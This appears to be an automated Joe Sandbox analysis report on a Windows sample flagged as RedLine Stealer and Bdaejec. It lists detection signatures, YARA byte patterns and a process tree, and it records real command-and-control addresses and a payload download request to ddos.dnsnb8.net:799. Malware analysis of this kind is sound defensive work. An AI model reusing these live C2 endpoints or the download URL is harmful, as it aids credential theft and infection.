Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Overview

General Information

Sample name:FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Analysis ID:1482558
MD5:c2bbbc6bb9408f1811a956ae26572f62
SHA1:aba71a8c8738a382b3acc454a8ae70a794d760b7
SHA256:9bc2f72646fcc040a0c11d469f353931f3d6eb606f8fa60bdcbd0fa091e59968
Tags:exeRedLineStealer
Infos:

Detection

Bdaejec, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe" MD5: C2BBBC6BB9408F1811A956AE26572F62)
    • IoUNtL.exe (PID: 2920 cmdline: C:\Users\user\AppData\Local\Temp\IoUNtL.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 5036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.106.191.123:34450", "Bot Id": "50n", "Authorization Header": "d61a9ba1568b3b8e34c959aa0f254969"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 5B 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 5B 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 8 entries
      SourceRuleDescriptionAuthorStrings
      0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 5B 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x1300:$s3: 83 EC 38 53 B0 5B 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1fdd0:$s5: delete[]
      • 0x1f288:$s6: constructor or from DllMain.
      0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 5B 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x28a1e:$pat14: , CommandLine:
        • 0x1d4fd:$v2_1: ListOfProcesses
        • 0x1cc78:$v4_3: base64str
        • 0x1cc45:$v4_4: stringKey
        • 0x1cc82:$v4_5: BytesToStringConverted
        • 0x1cc6d:$v4_6: FromBase64
        • 0x1d1b8:$v4_8: procName
        Click to see the 35 entries
        No Sigma rule has matched
        No Snort rule has matched
        Timestamp:2024-07-26T01:14:04.446908+0200
        SID:2022930
        Source Port:443
        Destination Port:49715
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-26T01:14:41.731017+0200
        SID:2022930
        Source Port:443
        Destination Port:49723
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-26T01:13:46.764340+0200
        SID:2807908
        Source Port:49704
        Destination Port:799
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-26T01:13:46.099545+0200
        SID:2838522
        Source Port:64685
        Destination Port:53
        Protocol:UDP
        Classtype:Malware Command and Control Activity Detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeAvira: detected
        Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rarzAvira URL Cloud: Label: phishing
        Source: http://ddos.dnsnb8.net:799/cj//k1.raruAvira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rarAAvira URL Cloud: Label: malware
        Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Avira URL Cloud: Label: malware
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
        Source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.106.191.123:34450", "Bot Id": "50n", "Authorization Header": "d61a9ba1568b3b8e34c959aa0f254969"}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
        Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeUnpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
        Source: Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

        Spreading

        barindex
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00F429E2
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00F42B8C
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

        Networking

        barindex
        Source: Malware configuration extractorURLs: 193.106.191.123:34450
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
        Source: global trafficTCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
        Source: global trafficTCP traffic: 192.168.2.5:49709 -> 193.106.191.123:34450
        Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
        Source: Joe Sandbox ViewIP Address: 193.106.191.123 193.106.191.123
        Source: Joe Sandbox ViewASN Name: BOSPOR-ASRU BOSPOR-ASRU
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.123
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F41099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00F41099
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
        Source: IoUNtL.exe, 00000001.00000003.2016658609.0000000000840000.00000004.00001000.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
        Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
        Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
        Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
        Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
        Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
        Source: IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarz
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
